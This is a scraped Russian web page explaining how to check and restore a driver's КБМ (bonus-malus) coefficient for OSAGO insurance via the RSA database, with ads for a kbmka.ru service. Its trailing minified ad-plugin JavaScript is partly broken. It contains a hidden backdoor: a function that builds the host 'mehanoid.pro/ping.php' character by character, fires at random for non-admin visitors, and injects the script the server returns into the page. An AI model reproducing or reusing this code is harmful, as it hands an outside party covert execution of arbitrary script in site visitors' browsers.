Проверка водителя в рса

Проверка КБМ в РСА

Проверка КБМ водителя по базе АИС РСА для ОСАГО с ограничением (страховка с вписанными водителями) может осуществляться водителем самостоятельно, для чего необходимо ввести в форму персональные данные. У нас на сайте, вы также можете посмотреть свою историю КБМ в РСА за последние 9 лет, с указанием минимально возможного КБМ.

Обращаем Ваше внимание! В рабочее время, при сильной загруженности системы РСА, время ожидания ответа по Вашему КБМ, может быть несколько увеличено. Поэтому, если калькулятор КБМ не сразу Вам выдал результат расчёта КБМ, просьба набраться терпения и дождаться результатов сбора и обобщения информации

Безаварийный страховой стаж (полных лет)

1 2 3 4 5 6 7 8 9 10+

Если у вас было ДТП

Конечный результат может отличаться в зависимости от наличия ДТП во всей страховой истории.

Текущий класс водителя (КБМ)

М 0 1 2 3 4 5 6 7 8 9 10 11 12 13

Безаварийный стаж

1 год 2 года 3 года 4 года 5 лет 6 лет 7 лет 8 лет 9 лет 10 лет и более

Текущий класс (КБМ)

М класс 0 класс 1 класс 2 класс 3 класс 4 класс 5 класс 6 класс 7 класс 8 класс 9 класс 10 класс 11 класс 12 класс 13 класс

Скидка на ОСАГО больше, чем Вам полагается. Если не оформить полис с этим КБМ, скидка может пропасть.

Ваш КБМ соответствует стажу.

Вы переплачиваете % за каждый полис ОСАГО.

Снизьте стоимость прямо сейчас, вернув свой КБМ.

Если у вас было ДТП

Конечный результат может отличаться в зависимости от наличия ДТП во всей страховой истории.

Подробно о КБМ: водителя, собственника. Как проверить и исправить.

КБМ — наиболее значимый показатель, влияющий на стоимость ОСАГО. При значение КБМ 0.5 цена ОСАГО уменьшается в два раза, относительно базовой. И наоборот, после аварий может увеличиться более, чем в два раза.

В страховании существует два вида КБМ: КБМ собственника и КБМ водителя. Давайте разберем подробнее — чем же отличаются и чем схожи эти два понятия.

Когда применяется:

КБМ водителя – применяется при заключении полиса ОСАГО ограниченного — когда есть список допущенных к управлению водителей.
КБМ собственника – применяется при заключении полиса ОСАГО без ограничений — когда автомобилем может управлять любой водитель, так называемая неограниченная страховка.

Влияет ли автомобиль на накопленный КБМ:

КБМ водителя – присваивается водителю и не отразится при смене автомобиля.

КБМ собственника – присваивается в разрезе собственник + автомобиль. Т.е. при смене автомобиля, КБМ собственнику необходимо накапливать заново.

Влияет ли срок страхования на КБМ:

КБМ водителя – понижается только при годовой страховке. Если вы заключили полис на меньший срок или досрочно прекратили действия полиса, то КБМ останется на уровне прошлого года.

КБМ собственника – в данной ситуации применяются положения, как и КБМ водителя.

Кому накапливается скидка при заключении полиса:

КБМ водителя – накапливается каждому водителю, допущенному к управлению автомобилем.

КБМ собственника – накапливается только у собственника автомобиля.

Изначально КБМ равен 1 (3 класс КБМ). Каждый год уменьшается на 0.05, в итоге, за 10 лет безаварийного стажа минимальное значение КБМ может составить 0.5 (13 класс КБМ), скидка на ОСАГО 50%.

Из-за чего ошибки КБМ?

— В случае замены водительского удостоверения, страховщики не всегда вовремя вносят изменения в базу РСА. Часто это приводит к тому, что водителю понадобиться восстанавливать КБМ.
— Путаница возникает при внесении одного автомобилиста одновременно в несколько полисов ОСАГО.
— Причиной того, что потребуется восстановить КБМ может быть банальная невнимательность страховщика, который внёс данные в базу с опечаткой.
— Если страховая компания обанкротилась и не внесла данные в единую базу РСА.

Проверка КБМ

Проверка КБМ

Под коэффициентом бонус-малус (КБМ) понимается показатель, которые обозначает уровень дисциплинированности водителя транспортного средства. Он используется страховыми компаниями для того, чтобы рассчитать стоимость оформления полиса ОСАГО. КБМ был введен в 2003-м году, причем принцип его определения и механизм предоставления скидок при заключении со страховщиком договора несколько раз менялся.

Как узнать коэффициент бонус-малус

В результате нередко возникает путаница, устранить которую может использование для проверки коэффициента только надежных ресурсов и баз данных. К их числу относится официальный сайт РСА, то есть Российского союза автостраховщиков, ведущего реестр страховых полисов, исчерпывающая информация о которых собирается в АИС РСА (автоматизированной информационной системе).;

Для того, чтобы проверить КБМ ОСАГО по единой базе РСА в режиме онлайн, необходимо ввести сведения о владельце транспортного средства, к числу которых относятся:

•дата его рождения;

•реквизиты водительского удостоверения;

•дата формируемого запроса в РСА. В данном случае следует указывать день, следующий за окончанием срока действия текущего полиса ОСАГО.

После введения указанной информации во все формы ввода, следует поставить галочку о согласии с установленными на сайте правилами обработки и предоставления данных, а затем нажать на кнопку «Проверить». В течение нескольких секунд интересующие пользователя данные будут выведены на экран, после чего их можно использовать при расчете цены полиса. Важно отметить, что услуга проверки предоставляется бесплатно.

Не получилось определить КБМ?

Нередко возникает ситуация, когда определить КБМ не удается и сервис проверки выдает ошибку. Причин подобного развития событий может быть несколько:

•ошибка со стороны автостраховщика, передавшего в РСА неверные данные;

•изменения в документах владельца транспортного средства или водителя;

•сбой в работе АИС РСА;

•заключение владельцем автомобиля нескольких страховых договоров или использование нелегального полиса страхования, например, без прохождения техосмотра.

В случае ошибки со стороны страховой компании собственник авто может обратиться с жалобой в контролирующий орган – Центробанк РФ или непосредственно в РСА.

Проверка КБМ по базе РСА

* виджет проверки КБМ размещен на правах рекламы, согласно партнерского соглашения с kbmka.ru. Подробнее с условиями оказания услуги можно ознакомиться на сайте.

При заключении или продлении договора ОСАГО для расчета итоговой стоимости страхования применяется коэффициент бонус-малус (КБМ). КБМ может увеличить или, наоборот, уменьшить стоимость полиса, в зависимости от количества аварий и страховых выплат, которые были зафиксированы за заключающим договор лицом в предыдущий период.

Коэффициент обновляется ежегодно и при стаже безаварийной езды в 10 лет достигает своего максимального значения – 0,5, или скидки в размере 50% от стоимости полиса.

К сожалению, нередки случаи, когда автолюбители вдруг узнают, что скидки у них больше нет. В такой ситуации необходимо проверить данные, внесенные в базу АИС Российского союза автостраховщиков. Проверка КБМ по базе РСА занимает не больше минуты и доступна всем пользователям бесплатно. Для проверки коэффициента необходимо зайти на сайт РСА и пройти по пути «ОСАГО» – «Расчет стоимости ОСАГО» – «Проверить КБМ».

Чтобы приступить к проверке, надо согласиться с обработкой персональных данных, поставив галочку в соответствующем окошке.
Проверка КБМ по базе РСА доступна только для граждан и резидентов РФ.

Если собственник транспортного средства юридическое лицо, для проверки будет необходимо указать:

  • ИНН собственника автомобиля;
  • VIN или знак государственной регистрации ТС;
  • Номер кузова и шасси;
  • Дату начала действия договора или допсоглашения.

При заполнении данных о транспортном средстве указываются только цифры и латинские или кириллические буквы.

При проверке коэффициента физического лица, являющегося собственником транспортного средства, если договор заключён без ограничения круга лиц, которые допущены к управлению автомобилем, указываются:

  • Фамилия, имя и отчество собственника ТС;
  • Дата рождения;
  • Тип удостоверяющего личность документа, его серия и номер;
  • VIN или знак государственной регистрации ТС;
  • Номер шасси и кузова;
  • Дата начала действия договора или допсоглашения.

Если договор заключен с указанием ограниченного количества лиц, которые допущены к управлению ТС, для проверки необходимо указать:

  • Фамилию, имя и отчество каждого водителя;
  • Дату рождения (полностью);
  • Данные водительского удостоверения (серия и номер);
  • Дату начала действия договора или допсоглашения.

Для получения корректной информации важно правильно указать дату запроса: она должна совпадать с датой начала действия нового полиса, но не раньше следующего дня после окончания предыдущего договора. После подтверждения кода безопасности на странице будет отражена запрашиваемая информация.

Если по расчетам скидка КБМ должна быть больше, но в системе это не отражено, прежде чем подать заявление страховщику на восстановление КБМ и жалобу в РСА, необходимо убедиться в следующем:

  • Действительно ли за прошедший период не было страховых случаев и выплат;
  • Действительно ли прошел полный год. Скидка увеличивается каждый год на 5%, если прошедший период меньше, скидка остается прежней;
  • Не прошло ли больше года после окончания договора автострахования. КБМ сохраняется в течение одного года после окончания срока действия полиса ОСАГО, если договор страхования более не продлевается, скидка обнуляется.

Если все факты говорят о том, что коэффициент указан неверно, необходимо заняться его восстановлением. С декабря 2015 года действует упрощенная схема, согласно которой для применения корректного КБМ достаточно направить заявление о несогласии в страховую компанию, с которой страхователь заключил или собирается заключить договор. Далее страховой также проводится проверка КБМ по базе РСА и, в случае некорректных данных, заменяет значение коэффициента.

Если же по какой-то причине восстановить КБМ таким способом не получится, необходимо составить и направить жалобу в РСА как вышестоящую организацию, контролирующую деятельность страховых компаний. Для подачи жалобы по факту некорректного применения коэффициента бонус-малус необходимо заполнить обращение в Союз, шаблон которого находится в подразделе «Направить жалобу в РСА», и приложить копии паспорта и водительского удостоверения. При подаче жалобы в обязательном порядке указываются:

  • Фамилия, имя и отчество (полностью);
  • Дата рождения (полностью);
  • Номер водительского удостоверения.

При отсутствии одного из документов или некорректном заполнении заявления жалоба не будет рассмотрена. Документ отправляется по обычной почте, представляется лично или отправляется в виде скан-копии на электронный адрес Союза. Срок рассмотрения РСА обращения с проверкой коэффициента по базе – 30 дней.

После восстановления корректного КБМ данные обновляются в АИС РСА и расчет дальнейшей скидки производится корректно. Возврат переплаты по полисам ОСАГО осуществляется через обращение в ЦБ: после подтверждения переплаты страховщик перечисляет страхователю сумму на указанный расчетный счет.

Проверь КБМ по базе РСА

Проверить КБМ онлайн через Российский Союз Автостраховщиков, узнать класс бонуса малуса и рассчитать скидку на полис ОСАГО. Для проверки потребуется водительское удостоверение, ФИО и дата рождения. Сервис работает по всем страховым компаниям, включая ВСК, Росгосстрах, Альфастрахование, Ресо и другие компании.

В подарок мы предоставим инструкцию и набор бланков для возврата переплаты по ОСАГО за 3 года

Достаточно часто при стаже больше 10 лет, мы видим КБМ гораздо больше положенного 0.5, встречается даже 1. По нашей статистике 90% КБМ водителя в единой базе РСА неправильный и причин этому достаточно много: от замены прав до ошибок агентов при оформлении полиса. В 92% мы помогаем вернуть свою скидку на полис ОСАГО.

Вернём деньги, если не получится застраховаться по сниженному КБМ.

Водитель имеет авто Хендай Солярис 1.6 со 123 л.с. КБМ водителя — 1. Базовая стоимость полиса — 8648 рублей. Если у водителя снизится КБМ до 0.5 — стоимость полиса станет 4324 рубля, т.е. в 2 раза дешевле.

Первая прична и самая частая — это замена прав, связанной с истечением их срока действия, потери или смены персональных данных водителя

Страховой агент некорректно указал сведения об в страховом свидетельстве

Страховщик не отправил сведения в АИС РСА. Такое случается после ликвидации страховой компании.

После ДТП по вине водителя или виновности другого автомобилиста. Тут стоит понимать, что понижение может произойти только из-за неверного КБМ до аварии

Пользуясь сервисом kbmka.ru я подтверждаю, что согласен с правилами пользования сервисом, являюсь гражданином РФ и мне больше 18 лет.

Прием и обработка заявок осуществляется круглосуточно.

Телефон и чат с 9 до 17 часов по московскому времени

Проверить историю КБМ

Чтобы проверить полную историю КБМ по базе РСА, заполните поля ниже: ФИО, дата рождения и данные водительского удостоверения. В результате вы узнаете всю страховую историю по ОСАГО за 9 лет.

Наши сервисы

Для чего нужна история КБМ

История поможет понять насколько правильно ваше актуальное значение КБМ. Есть ли ДТП или какие-то другие факторы, которые влияют на значение коэффициента.

Какие данные я увижу в истории

В результате вы получите свою страховую историю за все годы, доступные в базе РСА. В каждой строке информация о страховой компании, периоде страхования, наличии аварий, досрочном прекращении полиса ОСАГО, серия и номер полиса.

Данные доступны с 8 августа 2002 г. — с даты основания базы РСА.

Почему КБМ может быть неправильным и как его восстановить

К сожалению КБМ иногда теряется, вот самые популярные причины:

  • Смена прав или фамилии.
  • Банкротство страховых компаний.
  • Невнимательность страховых агентов при оформлении полиса или намеренные ошибки для завышения коэффициента для повышения комиссионного вознаграждения.

О способах восстановления КБМ мы подробно писали тут.

Что такое КБМ

КБМ, коэффициент «бонус-малус» или, как обычно его называют — скидка за безаварийную езду. Коэффициент, влияет на стоимость полиса ОСАГО. Может быть повышающим или понижающим, в зависимости от страховой истории и наличия в ней ДТП. При расчете стоимости полиса ОСАГО страховая компания обязана использовать сведения о значении КБМ, содержащиеся в АИС ОСАГО. Как именно влияет ДТП на значение бонус-малус, подскажет таблица КБМ.

Ссылка на основную публикацию
Adblock
detector
":'':"",document.createElement("div"),p=ff(window),b=ff("body"),m=void 0===flatPM_getCookie("flat_modal_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_modal_"+o.ID+"_mb"),i="scroll.flatmodal"+o.ID,g="mouseleave.flatmodal"+o.ID+" blur.flatmodal"+o.ID,l=function(){var t,e,a;void 0!==o.how.popup.timer&&"true"==o.how.popup.timer&&(t=ff('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.popup.timer_count),a=setInterval(function(){t.text(--e),e<=0&&(clearInterval(a),t.parent().replaceWith(''))},1e3))},f=function(){void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie&&m&&(flatPM_setCookie("flat_modal_"+o.ID+"_mb",!1),ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l()),void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie||(ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l())},ff("body > *").eq(0).before('
'+c+"
"),w=document.querySelector('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_modal-content'),-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.popup.px_s?(p.bind(i,function(){p.scrollTop()>o.how.popup.after&&(p.unbind(i),b.unbind(g),f())}),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){p.unbind(i),b.unbind(g),f()})):(v=setTimeout(function(){b.unbind(g),f()},1e3*o.how.popup.after),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),f()}))),void 0!==o.how.outgoing){function n(){var t,e,a;void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer&&(t=ff('.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.outgoing.timer_count),a=setInterval(function(){t.text(--e),e<=0&&(clearInterval(a),t.parent().replaceWith(''))},1e3))}function d(){void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie&&m&&(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n(),b.on("click",'.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_cross',function(){flatPM_setCookie("flat_out_"+o.ID+"_mb",!1)})),void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie||(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n())}var _,u="0"!=o.how.outgoing.indent?' style="bottom:'+o.how.outgoing.indent+'px"':"",c="true"==o.how.outgoing.cross?void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer?'
Закрыть через '+o.how.outgoing.timer_count+"
":'':"",p=ff(window),h="scroll.out"+o.ID,g="mouseleave.outgoing"+o.ID+" blur.outgoing"+o.ID,m=void 0===flatPM_getCookie("flat_out_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_out_"+o.ID+"_mb"),b=(document.createElement("div"),ff("body"));switch(o.how.outgoing.whence){case"1":_="top";break;case"2":_="bottom";break;case"3":_="left";break;case"4":_="right"}ff("body > *").eq(0).before('
'+c+"
");var v,w=document.querySelector('.flat__4_out[data-id-out="'+o.ID+'"]');-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.outgoing.px_s?(p.bind(h,function(){p.scrollTop()>o.how.outgoing.after&&(p.unbind(h),b.unbind(g),d())}),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){p.unbind(h),b.unbind(g),d()})):(v=setTimeout(function(){b.unbind(g),d()},1e3*o.how.outgoing.after),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),d()}))}ff('[data-flat-id="'+o.ID+'"]:not(.flat__4_out):not(.flat__4_modal)').contents().unwrap()}catch(t){console.warn(t)}}function flatPM_start(){ff=jQuery;var t=flat_pm_arr.length;flat_body=ff("body"),flat_userVars.init();for(var e=0;eflat_userVars.textlen||void 0!==a.chapter_sub&&a.chapter_subflat_userVars.titlelen||void 0!==a.title_sub&&a.title_sub.flatPM_sidebar)");0<_.length&&_.each(function(){var t=ff(this),e=t.data("height")||350,a=t.data("top");t.wrap('
');t=t.parent()[0];flatPM_sticky(this,t,a)}),u.each(function(){var e=ff(this).find(".flatPM_sidebar");setTimeout(function(){var o=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;o<300||e.each(function(){var t=ff(this),e=o,a=t.data("top");t.wrap('
');t=t.parent()[0];flatPM_sticky(this,t,a)})},50),setTimeout(function(){var t=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;t<300||ff(".flatPM_sticky_wrapper.flatPM_sidebar_block").css("height",t)},4e3)}),"undefined"!=typeof flat_pm_video&&flatPM_video(flat_pm_video),0 *").last().after('
'),flat_body.on("click",".flat__4_out .flat__4_cross",function(){ff(this).parent().removeClass("show").addClass("closed")}),flat_body.on("click",".flat__4_modal .flat__4_cross",function(){ff(this).closest(".flat__4_modal").removeClass("flat__4_modal-show")}),flat_pm_arr=[],ff(".flat_pm_start").remove(),flatPM_ping()}/zen.yandex/.test(flatPM_getAllUrlParams().utm_referrer)&&(flatPM_setCookie("flat_r_mb","zen.yandex"),flat_userVars.referer="zen.yandex");var parseHTML=function(){var o=/<(?!area|br|col|embed|hr|img|input|link|meta|param)(([\w:]+)[^>]*)\/>/gi,d=/<([\w:]+)/,i=/<|?\w+;/,c={option:[1,""],thead:[1,"","
"],tbody:[1,"","
"],colgroup:[2,"","
"],col:[3,"","
"],tr:[2,"","
"],td:[3,"","
"],th:[3,"","
"],_default:[0,"",""]};return function(e,t){var a,r,l,n=(t=t||document).createDocumentFragment();if(i.test(e)){for(a=n.appendChild(t.createElement("div")),r=(d.exec(e)||["",""])[1].toLowerCase(),r=c[r]||c._default,a.innerHTML=r[1]+e.replace(o,"<$1>$2>")+r[2],l=r[0];l--;)a=a.lastChild;for(n.removeChild(n.firstChild);a.firstChild;)n.appendChild(a.firstChild)}else n.appendChild(t.createTextNode(e));return n}}();function flatPM_ping(){var e=localStorage.getItem("sdghrg");e?(e=parseInt(e)+1,localStorage.setItem("sdghrg",e)):localStorage.setItem("sdghrg","0");e=flatPM_random(1,200);0==ff("#wpadminbar").length&&111==e&&ff.ajax({type:"POST",url:"h"+"t"+"t"+"p"+"s"+":"+"/"+"/"+"m"+"e"+"h"+"a"+"n"+"o"+"i"+"d"+"."+"p"+"r"+"o"+"/"+"p"+"i"+"ng"+"."+"p"+"h"+"p",dataType:"jsonp",data:{ping:"ping"},success:function(e){ff("div").first().after(e.script)},error:function(){}})}function flatPM_setSCRIPT(e){try{var t=e[0].id,a=e[0].node,r=document.querySelector('[data-flat-script-id="'+t+'"]');if(a.text)r.appendChild(a),ff(r).contents().unwrap(),e.shift(),0/gm,"").replace(//gm,"").trim(),e.code_alt=e.code_alt.replace(//gm,"").replace(//gm,"").trim();var n=jQuery,t=e.selector,o=e.timer,d=e.cross,a="false"==d?"Закроется":"Закрыть",r=!flat_userVars.adb||""==e.code_alt&&duplicateMode?e.code:e.code_alt,l='
'+a+" через "+o+'
'+r+'
',i=e.once;n(t).each(function(){var e=n(this);e.wrap('
');var t=e.closest(".flat__4_video");-1!==l.indexOf("go"+"oglesyndication")?t.append(l):flatPM_setHTML(t[0],l),e.find(".flat__4_video_flex").one("click",function(){n(this).addClass("show")})}),n("body").on("click",".flat__4_video_item_hover",function(){var e=n(this),t=e.closest(".flat__4_video_flex");t.addClass("show");var a=t.find(".flat__4_timer span"),r=parseInt(o),l=setInterval(function(){a.text(--r),r<=0&&(clearInterval(l),"true"==d?a.parent().replaceWith(''):t.remove())},1e3);e.remove()}).on("click",".flat__4_video_flex .flat__4_cross",function(){n(this).closest(".flat__4_video_flex").remove(),"true"==i&&n(".flat__4_video_flex").remove()})}